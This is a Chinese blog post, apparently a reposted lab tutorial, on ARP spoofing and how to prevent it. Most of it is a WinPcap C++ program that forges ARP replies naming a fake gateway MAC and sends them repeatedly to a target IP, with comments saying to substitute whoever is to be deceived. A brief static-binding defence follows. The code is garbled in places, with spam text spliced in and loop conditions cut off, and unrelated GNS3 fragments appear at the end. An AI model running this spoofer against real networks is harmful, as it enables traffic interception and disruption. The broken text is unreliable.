arp欺骗与防止欺骗的示例分析,相信很多没有经验的人对此束手无策,为此本文总结了问题出现的原因和解决方法,通过这篇文章希望你能解决这个问题。完整文件如下:我欺骗的是(172.28.15.32)// WinpCap Test.cpp : 定义控制台应用程序的入口点。//#include “stdafx.h”#include.h>int _tmain(int argc, _TCHAR* argv[]){ pcap_if_t * allAdapters;//适配器列表 pcap_if_t * adapter; pcap_t * adapterHandle;//适配器句柄 u_char packet[ 1020 ]; //待发送的数据封包 char errorBuffer[ PCAP_ERRBUF_SIZE ];//错误信息缓冲区 if( pcap_findalldevs_ex( PCAP_SRC_IF_STRING, NULL, &allAdapters, errorBuffer ) == -1 ) {//检索机器连接的所有网络适配器 fprintf( stderr, “Error in pcap_findalldevs_ex function: %sn”, errorBuffer ); return -1; } if( allAdapters == NULL ) {//不存在任何适配器 printf( “nNo adapters found! Make sure WinPcap is installed.n” ); return 0; } int crtAdapter = 0; for( adapter = allAdapters; adapter != NULL; adapter = adapter->next) {//遍历输入适配器信息(名称和描述信息) printf( “n%d.%s “, ++crtAdapter, adapter->name ); printf( “– %sn”, adapter->description ); } printf( “n” ); //选择适配器 int adapterNumber; printf( “Enter the adapter number between 1 and %d:”, crtAdapter ); scanf_s( “%d”, &adapterNumber ); if( adapterNumber crtAdapter ) { printf( “nAdapter number out of range.n” ); pcap_freealldevs( allAdapters );// 释放适配器列表 return -1; } adapter = allAdapters; for( crtAdapter = 0; crtAdapter
adapter = adapter->next; // 打开指定适配器 adapterHandle = pcap_open( adapter->name, // name of the adapter 65536, // portion of the packet to capture // 65536 guarantees that the whole // packet will be captured PCAP_OPENFLAG_PROMISCUOUS, // promiscuous mode 1000, // read timeout – 1 millisecond NULL, // authentication on the remote machine errorBuffer // error buffer ); if( adapterHandle == NULL ) {//指定适配器打开失败 fprintf( stderr, “nUnable to open the adaptern”, adapter->name ); // 释放适配器列表 pcap_freealldevs( allAdapters ); return -1; } pcap_freealldevs( allAdapters );//释放适配器列表 //创建数据封包 packet[0] = 0xc8; packet[1] = 0x9c; packet[2] = 0xdc; packet[3] = 0x22; packet[4] = 0x62; packet[5] = 0x43; // 被骗计算机的mac地址packet[6] = 0x00; packet[7] = 0x24; packet[8] = 0x8c; packet[9] = 0x86; packet[10] = 0x43; packet[11] = 91; // 自己的mac地址packet[12] = 0x08; packe免费云主机域名t[13] = 0x06; // 以太网封装arp协议(不用动)packet[14] = 0x00; packet[15] = 0x01; // arp第1字段:代表以太网packet[16] = 0x08; packet[17] = 0x00; // arp第2字段:代表IP协议packet[18] = 0x06; // arp第3字段:代表第二层地址的长度packet[19] = 0x04; // arp第4字段:代表第三层地址的长度packet[20] = 0x00; packet[21] = 0x02; // arp第5字段:这是一个arp应答报文; 下面的是arp的第6,7,8,9字段packet[22] = 0xc8; packet[23] = 0x9c; packet[24] = 0xdc; packet[25] = 0x22; packet[26] = 0x62; packet[27] = 0x06; // 假的网关地址,packet[28] = 0xac; packet[29] = 0x1c;packet[30] = 0x0f; packet[31] = 0xfe; // 网关的ip,这里是172.28.15.254(在本实验室不用改)packet[32] = 0xc8; packet[33] = 0x9c; packet[34] = 0xdc; packet[35] = 0x22; packet[36] = 0x62; packet[37] = 0x43; // 被骗计算机的mac地址packet[38] = 0xac; packet[39] = 0x1c;packet[40] = 0x0f; packet[41] = 0x1f; // 被骗计算机的IP地址,这里是172.28.15.19 (想骗谁,这里就改成谁的IP) //发送数据封包for(int ssde=0;ssde{pcap_sendpacket( adapterHandle, packet, 42);Sleep(1000);} system( “PAUSE” ); return 0;}防止arp欺骗的方法可以把mac地址绑定为静态输入arp -a 自己的IP地址 mac地址
但这只是临时的,关机重启就没了。 arp -d 命令可以删除静态mac地址。看完上述内容,你们掌握arp欺骗与防止欺骗的示例分析的方法了吗?如果还想学到更多技能或想了解更多相关内容,欢迎关注云编程开发博客行业资讯频道,感谢各位的阅读!
在GNS3上连接设备配置路由器(1)R1(2)R2(3)R3(4)R4查看路由表测试连通性(免费云主机域名1)(2)(3)(4)(5)(6)(7)拓扑图相关推荐: 有关NDES管理帐号及用户帐号权限IF your DC and CA use same serv…
免责声明:本站发布的图片视频文字,以转载和分享为主,文章观点不代表本站立场,本站不承担相关法律责任;如果涉及侵权请联系邮箱:360163164@qq.com举报,并提供相关证据,经查实将立刻删除涉嫌侵权内容。
微信扫一扫 
